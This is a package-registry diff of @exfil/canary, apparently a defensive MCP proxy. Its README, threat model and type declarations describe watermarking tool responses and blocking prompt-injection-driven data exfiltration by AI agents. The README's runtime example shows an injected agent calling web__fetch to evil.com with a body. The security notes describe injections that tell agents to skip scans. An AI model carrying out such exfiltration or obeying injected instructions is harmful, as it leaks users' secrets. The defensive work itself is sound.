@exfil/canary 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (69) hide show
  1. package/LICENSE +21 -0
  2. package/README.md +387 -0
  3. package/SECURITY.md +50 -0
  4. package/dist/entities.d.ts +43 -0
  5. package/dist/entities.d.ts.map +1 -0
  6. package/dist/entities.js +218 -0
  7. package/dist/entities.js.map +1 -0
  8. package/dist/index.d.ts +14 -0
  9. package/dist/index.d.ts.map +1 -0
  10. package/dist/index.js +183 -0
  11. package/dist/index.js.map +1 -0
  12. package/dist/logger.d.ts +29 -0
  13. package/dist/logger.d.ts.map +1 -0
  14. package/dist/logger.js +50 -0
  15. package/dist/logger.js.map +1 -0
  16. package/dist/persistence.d.ts +48 -0
  17. package/dist/persistence.d.ts.map +1 -0
  18. package/dist/persistence.js +296 -0
  19. package/dist/persistence.js.map +1 -0
  20. package/dist/proxy/DownstreamManager.d.ts +55 -0
  21. package/dist/proxy/DownstreamManager.d.ts.map +1 -0
  22. package/dist/proxy/DownstreamManager.js +110 -0
  23. package/dist/proxy/DownstreamManager.js.map +1 -0
  24. package/dist/proxy/ProxyServer.d.ts +60 -0
  25. package/dist/proxy/ProxyServer.d.ts.map +1 -0
  26. package/dist/proxy/ProxyServer.js +480 -0
  27. package/dist/proxy/ProxyServer.js.map +1 -0
  28. package/dist/proxy/auditor/DualAuditor.d.ts +27 -0
  29. package/dist/proxy/auditor/DualAuditor.d.ts.map +1 -0
  30. package/dist/proxy/auditor/DualAuditor.js +44 -0
  31. package/dist/proxy/auditor/DualAuditor.js.map +1 -0
  32. package/dist/proxy/auditor/LLMAuditor.d.ts +16 -0
  33. package/dist/proxy/auditor/LLMAuditor.d.ts.map +1 -0
  34. package/dist/proxy/auditor/LLMAuditor.js +221 -0
  35. package/dist/proxy/auditor/LLMAuditor.js.map +1 -0
  36. package/dist/proxy/auditor/types.d.ts +54 -0
  37. package/dist/proxy/auditor/types.d.ts.map +1 -0
  38. package/dist/proxy/auditor/types.js +11 -0
  39. package/dist/proxy/auditor/types.js.map +1 -0
  40. package/dist/proxy/types.d.ts +71 -0
  41. package/dist/proxy/types.d.ts.map +1 -0
  42. package/dist/proxy/types.js +8 -0
  43. package/dist/proxy/types.js.map +1 -0
  44. package/dist/scanner.d.ts +37 -0
  45. package/dist/scanner.d.ts.map +1 -0
  46. package/dist/scanner.js +57 -0
  47. package/dist/scanner.js.map +1 -0
  48. package/dist/server.d.ts +59 -0
  49. package/dist/server.d.ts.map +1 -0
  50. package/dist/server.js +711 -0
  51. package/dist/server.js.map +1 -0
  52. package/dist/simhash.d.ts +65 -0
  53. package/dist/simhash.d.ts.map +1 -0
  54. package/dist/simhash.js +151 -0
  55. package/dist/simhash.js.map +1 -0
  56. package/dist/state.d.ts +86 -0
  57. package/dist/state.d.ts.map +1 -0
  58. package/dist/state.js +136 -0
  59. package/dist/state.js.map +1 -0
  60. package/dist/token.d.ts +70 -0
  61. package/dist/token.d.ts.map +1 -0
  62. package/dist/token.js +146 -0
  63. package/dist/token.js.map +1 -0
  64. package/dist/types.d.ts +190 -0
  65. package/dist/types.d.ts.map +1 -0
  66. package/dist/types.js +12 -0
  67. package/dist/types.js.map +1 -0
  68. package/package.json +52 -0
  69. package/proxy.example.json +53 -0
package/LICENSE ADDED
@@ -0,0 +1,21 @@
1
+ MIT License
2
+
3
+ Copyright (c) 2026 exfil
4
+
5
+ Permission is hereby granted, free of charge, to any person obtaining a copy
6
+ of this software and associated documentation files (the "Software"), to deal
7
+ in the Software without restriction, including without limitation the rights
8
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9
+ copies of the Software, and to permit persons to whom the Software is
10
+ furnished to do so, subject to the following conditions:
11
+
12
+ The above copyright notice and this permission notice shall be included in all
13
+ copies or substantial portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21
+ SOFTWARE.
package/README.md ADDED
@@ -0,0 +1,387 @@
1
+ # @exfil/canary
2
+
3
+ A transparent MCP proxy that watermarks every tool response and blocks data exfiltration caused by prompt injection.
4
+
5
+ Your AI agent reads a file. A malicious string inside that file tells it to forward the contents to an attacker. **@exfil/canary catches it and blocks the call.**
6
+
7
+ ---
8
+
9
+ ## How it works
10
+
11
+ @exfil/canary sits between your agent and all its MCP servers. Every tool response gets invisibly watermarked. Every outbound tool call is inspected across four independent detection layers:
12
+
13
+ 1. **Unicode marker** — exact sequence match. Catches direct forwarding.
14
+ 2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
15
+ 3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
16
+ 4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate every outbound call. Both must agree CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
17
+
18
+ Plus two enforcement layers:
19
+ - **Domain allowlist** — fail-closed. Any outbound URL not explicitly listed is blocked, regardless of whether a token was found.
20
+ - **Tool allowlist** — restrict which tools the agent is allowed to call at all.
21
+
22
+ ---
23
+
24
+ ## Modes
25
+
26
+ | Mode | How it works |
27
+ |---|---|
28
+ | **Proxy** _(recommended)_ | @exfil/canary wraps all your other MCP servers. The agent connects only to @exfil/canary. Every response is automatically watermarked; every outbound call is automatically scanned. No system prompt required. |
29
+ | **Standalone** | @exfil/canary is one server among many. The agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. |
30
+
31
+ ---
32
+
33
+ ## Install
34
+
35
+ ```bash
36
+ npm install -g @exfil/canary
37
+ ```
38
+
39
+ Or run without installing:
40
+
41
+ ```bash
42
+ npx @exfil/canary
43
+ ```
44
+
45
+ Requires Node.js 18+.
46
+
47
+ ---
48
+
49
+ ## Proxy Mode — Setup
50
+
51
+ ### 1. Create `proxy.json`
52
+
53
+ Start from the example:
54
+
55
+ ```bash
56
+ cp node_modules/@exfil/canary/proxy.example.json proxy.json
57
+ ```
58
+
59
+ Or write it from scratch. List every downstream MCP server you want to protect:
60
+
61
+ ```json
62
+ {
63
+ "servers": [
64
+ {
65
+ "id": "filesystem",
66
+ "command": "npx",
67
+ "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/working/dir"]
68
+ },
69
+ {
70
+ "id": "web",
71
+ "command": "npx",
72
+ "args": ["-y", "@modelcontextprotocol/server-fetch"]
73
+ }
74
+ ],
75
+ "allowed_domains": [
76
+ "api.github.com",
77
+ "registry.npmjs.org"
78
+ ]
79
+ }
80
+ ```
81
+
82
+ **`allowed_domains` is fail-closed.** If the field is absent or empty, all outbound URLs are blocked. List every domain your agent legitimately calls.
83
+
84
+ Each server entry:
85
+ | Field | Required | Description |
86
+ |---|---|---|
87
+ | `id` | Yes | Short name used as tool namespace prefix (e.g. `filesystem__read_file`). Must be lowercase, start with a letter. |
88
+ | `command` | Yes | Executable to spawn. |
89
+ | `args` | No | CLI arguments. |
90
+ | `env` | No | Extra environment variables for that server. |
91
+
92
+ ### 2. Register in your MCP client
93
+
94
+ **Claude Desktop** (`%APPDATA%\Claude\claude_desktop_config.json` on Windows, `~/Library/Application Support/Claude/claude_desktop_config.json` on macOS):
95
+
96
+ ```json
97
+ {
98
+ "mcpServers": {
99
+ "canary": {
100
+ "command": "exfil-canary",
101
+ "env": {
102
+ "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
103
+ "CANARY_MCP_RESPONSE_MODE": "halt",
104
+ "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
105
+ }
106
+ }
107
+ }
108
+ }
109
+ ```
110
+
111
+ **Claude Code** (`~/.claude/settings.json` or project `.mcp.json`):
112
+
113
+ ```json
114
+ {
115
+ "mcpServers": {
116
+ "canary": {
117
+ "command": "exfil-canary",
118
+ "env": {
119
+ "CANARY_MCP_PROXY_CONFIG": "/absolute/path/to/proxy.json",
120
+ "CANARY_MCP_RESPONSE_MODE": "halt",
121
+ "CANARY_MCP_MGMT_KEY": "choose-a-secret-key"
122
+ }
123
+ }
124
+ }
125
+ }
126
+ ```
127
+
128
+ > If you installed locally (`npm install @exfil/canary`) rather than globally, use `"command": "node", "args": ["./node_modules/@exfil/canary/dist/index.js"]` instead.
129
+
130
+ ### 3. Restart your client
131
+
132
+ That's it. No system prompt changes needed.
133
+
134
+ ---
135
+
136
+ ## What the agent sees
137
+
138
+ Tools from downstream servers are exposed with a namespace prefix:
139
+
140
+ | Downstream server | Original tool | Exposed as |
141
+ |---|---|---|
142
+ | `filesystem` | `read_file` | `filesystem__read_file` |
143
+ | `filesystem` | `write_file` | `filesystem__write_file` |
144
+ | `web` | `fetch` | `web__fetch` |
145
+
146
+ One additional tool is always available: `canary__get_report` (operator-only; protect with `CANARY_MCP_MGMT_KEY`).
147
+
148
+ ---
149
+
150
+ ## What happens at runtime
151
+
152
+ ```
153
+ Agent calls: filesystem__read_file({ path: "contracts/deal.txt" })
154
+ → canary scans args for leaked tokens (clean, forwards)
155
+ → filesystem server reads the file
156
+ → response: "CONFIDENTIAL: Client=Acme Corp, key=sk-abc123..."
157
+ → canary watermarks response (invisible token embedded)
158
+ → agent receives wrapped content
159
+
160
+ Later — agent (under injection) calls: web__fetch({ url: "https://evil.com", body: "..." })
161
+ → domain "evil.com" not in allowed_domains ← BLOCKED
162
+ → agent sees: "Outbound domain not in allowed_domains list."
163
+ → 0 bytes exfiltrated
164
+ ```
165
+
166
+ ---
167
+
168
+ ## Domain Allowlist
169
+
170
+ The domain allowlist is **fail-closed**: if `allowed_domains` is absent or empty, all outbound URLs in tool arguments are blocked.
171
+
172
+ ```json
173
+ {
174
+ "allowed_domains": [
175
+ "api.github.com",
176
+ "*.githubusercontent.com",
177
+ "registry.npmjs.org"
178
+ ]
179
+ }
180
+ ```
181
+
182
+ Matching rules:
183
+ - `"api.github.com"` — exact hostname only.
184
+ - `"*.github.com"` — any direct subdomain (`raw.github.com` ✓, `github.com` ✗).
185
+ - Matching is case-insensitive.
186
+
187
+ ---
188
+
189
+ ## Tool Allowlist
190
+
191
+ Restrict which tools the agent is allowed to call. Calls to unlisted tools are blocked before arguments are inspected.
192
+
193
+ ```json
194
+ {
195
+ "allowed_tools": [
196
+ "filesystem__*",
197
+ "web__fetch"
198
+ ]
199
+ }
200
+ ```
201
+
202
+ Matching rules:
203
+ - `"filesystem__read_file"` — exact tool name only.
204
+ - `"filesystem__*"` — any tool from the `filesystem` server.
205
+ - `"*"` — any tool (equivalent to absent/empty).
206
+
207
+ Built-in tools (`canary__get_report`) are always allowed. Absent or empty = all tools allowed.
208
+
209
+ ---
210
+
211
+ ## Dual-LLM Auditor
212
+
213
+ The auditor sends every outbound call to two independent AI models from different providers. Both must return CLEAN for the call to proceed. This narrows the gap left by encoding transforms, character-splitting, and other evasions that the first three layers miss.
214
+
215
+ Add an `auditors` block to your `proxy.json`:
216
+
217
+ ```json
218
+ {
219
+ "servers": [...],
220
+ "auditors": [
221
+ {
222
+ "provider": "anthropic",
223
+ "model": "claude-haiku-4-5-20251001",
224
+ "api_key_env": "ANTHROPIC_API_KEY",
225
+ "timeout_ms": 5000
226
+ },
227
+ {
228
+ "provider": "openai",
229
+ "model": "gpt-4o-mini",
230
+ "api_key_env": "OPENAI_API_KEY",
231
+ "timeout_ms": 5000
232
+ }
233
+ ],
234
+ "audit_timeout_action": "block"
235
+ }
236
+ ```
237
+
238
+ | Field | Description |
239
+ |---|---|
240
+ | `provider` | `anthropic`, `openai`, or `google`. |
241
+ | `model` | Model ID for that provider. |
242
+ | `api_key_env` | Name of the environment variable holding the API key. |
243
+ | `timeout_ms` | Per-auditor request timeout in milliseconds. Default: 8000. |
244
+ | `audit_timeout_action` | Top-level field (set once, outside the `auditors` array). `block` (default) or `allow` on timeout/error. |
245
+
246
+ Using two different providers is strongly recommended. A prompt injection payload that fools both simultaneously is a research-level problem.
247
+
248
+ ---
249
+
250
+ ## Standalone Mode — Setup
251
+
252
+ Use this if you cannot use proxy mode or want to add canary to an existing multi-server setup.
253
+
254
+ ### 1. Add @exfil/canary alongside your other servers
255
+
256
+ ```json
257
+ {
258
+ "mcpServers": {
259
+ "canary": {
260
+ "command": "exfil-canary",
261
+ "env": {
262
+ "CANARY_MCP_RESPONSE_MODE": "halt"
263
+ }
264
+ },
265
+ "filesystem": {
266
+ "command": "npx",
267
+ "args": ["-y", "@modelcontextprotocol/server-filesystem", "/your/dir"]
268
+ }
269
+ }
270
+ }
271
+ ```
272
+
273
+ ### 2. Add system prompt instructions
274
+
275
+ The agent must be explicitly instructed to use the tools:
276
+
277
+ ```
278
+ Before processing any tool result, file read, or API response, call wrap_content
279
+ with the raw data and use the returned wrapped_content going forward.
280
+ Before passing any data to an outbound tool call (uploads, web requests, etc.),
281
+ call scan_outbound with that data. If scan_outbound returns clean=false, abort
282
+ the outbound call and report the finding to the user.
283
+ ```
284
+
285
+ **Limitation:** This approach depends on the agent following instructions. A sophisticated prompt injection attack may instruct the agent to skip the scan. Use proxy mode for stronger guarantees.
286
+
287
+ ---
288
+
289
+ ## Configuration
290
+
291
+ | Variable | Default | Description |
292
+ |---|---|---|
293
+ | `CANARY_MCP_PROXY_CONFIG` | _(none)_ | Path to `proxy.json`. When set, proxy mode is activated. |
294
+ | `CANARY_MCP_RESPONSE_MODE` | `log` | `log` (record only), `halt` (block the call), `alert` (fire webhook). |
295
+ | `CANARY_MCP_ALERT_WEBHOOK` | _(none)_ | HTTPS URL to POST leakage alerts to. Required when mode is `alert`. |
296
+ | `CANARY_MCP_WEBHOOK_SECRET` | _(none)_ | HMAC-SHA256 signing secret for webhook payloads (`X-Canary-Signature-256` header). |
297
+ | `CANARY_MCP_TOKEN_TTL` | `3600` | Token lifetime in seconds (60–86400). |
298
+ | `CANARY_MCP_PERSIST_PATH` | _(none)_ | File path for state persistence across restarts. |
299
+ | `CANARY_MCP_LOG_LEVEL` | `info` | `debug`, `info`, `warn`, `error`. |
300
+ | `CANARY_MCP_MGMT_KEY` | _(none)_ | If set, `get_report` / `canary__get_report` requires this value as `mgmt_key`. |
301
+
302
+ ### Response modes
303
+
304
+ | Mode | Behaviour |
305
+ |---|---|
306
+ | `log` | Detection is recorded and logged. The operation continues. |
307
+ | `halt` | Detection throws an MCP error, stopping the operation immediately. |
308
+ | `alert` | Detection is recorded and a webhook POST is fired. The operation continues. |
309
+
310
+ ---
311
+
312
+ ## Tool Reference (Standalone Mode)
313
+
314
+ In proxy mode these tools are called internally. In standalone mode the agent calls them explicitly.
315
+
316
+ ### `wrap_content`
317
+
318
+ Embeds an invisible marker into content and returns it with a tracking ID.
319
+
320
+ | Field | Type | Required | Description |
321
+ |---|---|---|---|
322
+ | `content` | string | Yes | Raw content to mark (max 10 MiB). |
323
+ | `source_type` | enum | Yes | `tool_result`, `file_read`, `api_response`, `database_row`, `user_message`, `other`. |
324
+ | `source_server` | string | No | Originating MCP server. |
325
+ | `source_tool` | string | No | Originating tool name. |
326
+ | `embed_position` | enum | No | `prefix`, `suffix` (default), `both`, `random_word_boundary`. |
327
+
328
+ ```json
329
+ { "token_id": "a3f1...", "wrapped_content": "<content with invisible marker>" }
330
+ ```
331
+
332
+ ### `check_leakage`
333
+
334
+ Checks whether a specific token appears in a given string.
335
+
336
+ | Field | Type | Required | Description |
337
+ |---|---|---|---|
338
+ | `token_id` | string | Yes | 32-char hex ID from `wrap_content`. |
339
+ | `output` | string | Yes | Text to inspect (max 10 MiB). |
340
+ | `target_server` | string | No | MCP server receiving the data. |
341
+ | `target_tool` | string | No | Tool receiving the data. |
342
+
343
+ ```json
344
+ { "token_id": "a3f1...", "status": "active", "leaked": true, "action_taken": "halted" }
345
+ ```
346
+
347
+ ### `scan_outbound`
348
+
349
+ Scans data for any active token before it leaves the agent.
350
+
351
+ | Field | Type | Required | Description |
352
+ |---|---|---|---|
353
+ | `data` | string | Yes | Data about to be sent outbound (max 50 MiB). |
354
+ | `target_server` | string | No | Destination MCP server. |
355
+ | `target_tool` | string | No | Destination tool. |
356
+
357
+ ```json
358
+ { "clean": true, "tokens_scanned": 12, "scan_duration_ms": 3, "leakage_count": 0 }
359
+ ```
360
+
361
+ ### `get_report` / `canary__get_report`
362
+
363
+ Returns the full session: all token metadata and leakage events. Operator-only — protect with `CANARY_MCP_MGMT_KEY`.
364
+
365
+ ---
366
+
367
+ ## Persistence
368
+
369
+ When `CANARY_MCP_PERSIST_PATH` is set, state is written atomically after every mutation (file mode `0o600`).
370
+
371
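+ **Limitation:** Unicode marker sequences are never persisted. After a restart, tokens loaded from the persistence file can no longer be matched by the exact-sequence check; only content watermarked after the restart is covered by that layer. Leakage history is retained.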
372
+
373
+ ---
374
+
375
+ ## Building from Source
376
+
377
+ ```bash
378
+ git clone https://github.com/exfil-hq/canary.git
379
+ cd canary
380
+ npm install
381
+ npm run build # outputs to dist/
382
+ npm test
383
+ ```
384
+
385
+ ---
386
+
387
+ See [SECURITY.md](./SECURITY.md) for the full threat model and known limitations.
package/SECURITY.md ADDED
@@ -0,0 +1,50 @@
1
+ # Security — Threat Model and Known Limitations
2
+
3
+ ## What @exfil/canary protects against
4
+
5
+ @exfil/canary detects and blocks data exfiltration caused by prompt injection attacks against MCP-connected AI agents. It operates as a transparent proxy: the agent connects only to @exfil/canary, which intercepts every tool call in both directions.
6
+
7
+ ### Threat model
8
+
9
+ An attacker embeds malicious instructions inside content that the agent reads (a file, a web page, an API response, a database row). Those instructions direct the agent to forward sensitive data to an attacker-controlled destination.
10
+
11
+ @exfil/canary defends against this in two complementary ways:
12
+
13
+ **Detection** — every tool response is watermarked. If the agent later tries to forward that content, the watermark is found in the outbound call and the operation is blocked (in `halt` mode) or recorded.
14
+
15
+ Four independent detection layers are applied to every outbound call:
16
+
17
+ 1. **Unicode marker** — exact invisible sequence match. Catches direct forwarding.
18
+ 2. **Named entity** — extracted values (API keys, emails, UUIDs, bearer tokens) matched independently. Catches exfiltration that strips invisible characters.
19
+ 3. **SimHash** — semantic fingerprint of the original content. Catches paraphrased or summarised exfiltration.
20
+ 4. **Dual-LLM auditor** — two independent AI models from different providers both evaluate the outbound call in context. Both must return CLEAN for the call to proceed. Catches encoding transforms, character splitting, and other evasions the first three layers miss.
21
+
22
+ **Containment** — even if exfiltration of watermarked content goes undetected, the domain allowlist blocks calls to destinations that were never authorised. An injection payload cannot exfiltrate through the proxy to an unlisted domain, regardless of how the content is encoded.
23
+
24
+ ---
25
+
26
+ ## Known limitations
27
+
28
+ ### Sequence persistence
29
+
30
+ Unicode marker sequences are never written to disk. After a process restart, tokens loaded from a persistence file have their sequences cleared. The entity, SimHash, and auditor layers still operate on these tokens; only the exact-sequence check is unavailable until new content is read post-restart.
31
+
32
+ ### Standalone mode
33
+
34
+ In standalone mode the agent must be instructed via system prompt to call `wrap_content` and `scan_outbound` explicitly. A sophisticated prompt injection payload may instruct the agent to skip these calls. Proxy mode does not have this limitation — interception is structural and cannot be bypassed by instructions to the agent.
35
+
36
+ ### Auditor layer
37
+
38
+ The dual-LLM auditor adds a probabilistic layer. It is not guaranteed to detect all forms of derived content. Using two providers from different organisations significantly raises the bar, but a sufficiently crafted payload could theoretically fool both models simultaneously.
39
+
40
+ When `audit_timeout_action` is set to `allow`, a network failure or provider outage causes the auditor layer to be skipped silently. Set it to `block` (the default) in high-sensitivity environments.
41
+
42
+ ### Domain allowlist scope
43
+
44
+ The domain allowlist inspects URL hostnames found in serialised tool call arguments. It does not inspect binary content, image data, or other non-text payloads. It also does not prevent a compromised downstream server from making outbound calls on its own — it only controls what the agent sends through the proxy.
45
+
46
+ ---
47
+
48
+ ## Responsible disclosure
49
+
50
+ To report a security vulnerability, open a private advisory on the [GitHub repository](https://github.com/exfil-hq/canary) or email the maintainers directly via the contact listed in the repository profile.
@@ -0,0 +1,43 @@
1
+ /**
2
+ * v1.1 — Named entity extraction for structural canary injection.
3
+ *
4
+ * Extracts identifiable values from content at wrap time and stores them as
5
+ * EntityCanary records alongside the Unicode sequence marker. When scanning
6
+ * outbound data, exfil/canary checks for the presence of these extracted values
7
+ * in addition to the Unicode marker — catching exfiltration that involves
8
+ * paraphrasing or rewriting, as long as the underlying identifier (e.g. an
9
+ * API key, email address, or UUID) is reproduced verbatim.
10
+ *
11
+ * SECURITY: Extracted values are treated with the same sensitivity as the
12
+ * Unicode sequence — they are never returned in tool outputs, never logged,
13
+ * and never persisted in plaintext.
14
+ *
15
+ * Detection coverage added by v1.1 vs v1.0:
16
+ * - Agent reads "API key: sk-abc123" and writes "key=sk-abc123" → DETECTED
17
+ * - Agent reads email content and includes recipient addr in forward → DETECTED
18
+ * - Raw copy-paste / direct forwarding → DETECTED (v1.0)
19
+ * - Agent summarises with different phrasing, no literal value → NOT detected (v2.0)
20
+ */
21
+ import type { EntityCanary } from './types.js';
22
+ /**
23
+ * Extracts named entities from `content` for use as structural canary markers.
24
+ *
25
+ * Each unique entity value is returned at most once, even if it appears
26
+ * multiple times in the content. Values are de-duplicated case-sensitively
27
+ * for exact matching.
28
+ *
29
+ * @param content The raw content to analyse (before embedding the Unicode token).
30
+ * @returns Array of EntityCanary records. May be empty if no entities found.
31
+ */
32
+ export declare function extractEntities(content: string): EntityCanary[];
33
+ /**
34
+ * Checks whether any of the provided entity values appear in `data`.
35
+ * Returns the matching entity canaries with their values intact (internal use
36
+ * only — callers must expose just entity_type + context_hint when building reports).
37
+ *
38
+ * @param data The outbound string to scan.
39
+ * @param canaries Entity canaries to check for.
40
+ * @returns Array of matched canaries (values intact for internal use only).
41
+ */
42
+ export declare function scanForEntityValues(data: string, canaries: EntityCanary[]): EntityCanary[];
43
+ //# sourceMappingURL=entities.d.ts.map
@@ -0,0 +1 @@
1
+ {"version":3,"file":"entities.d.ts","sourceRoot":"","sources":["../src/entities.ts"],"names":[],"mappings":"AAAA;;;;;;;;;;;;;;;;;;;GAmBG;AAEH,OAAO,KAAK,EAAE,YAAY,EAAc,MAAM,YAAY,CAAC;AA6K3D;;;;;;;;;GASG;AACH,wBAAgB,eAAe,CAAC,OAAO,EAAE,MAAM,GAAG,YAAY,EAAE,CAwC/D;AAED;;;;;;;;GAQG;AACH,wBAAgB,mBAAmB,CACjC,IAAI,EAAE,MAAM,EACZ,QAAQ,EAAE,YAAY,EAAE,GACvB,YAAY,EAAE,CAUhB"}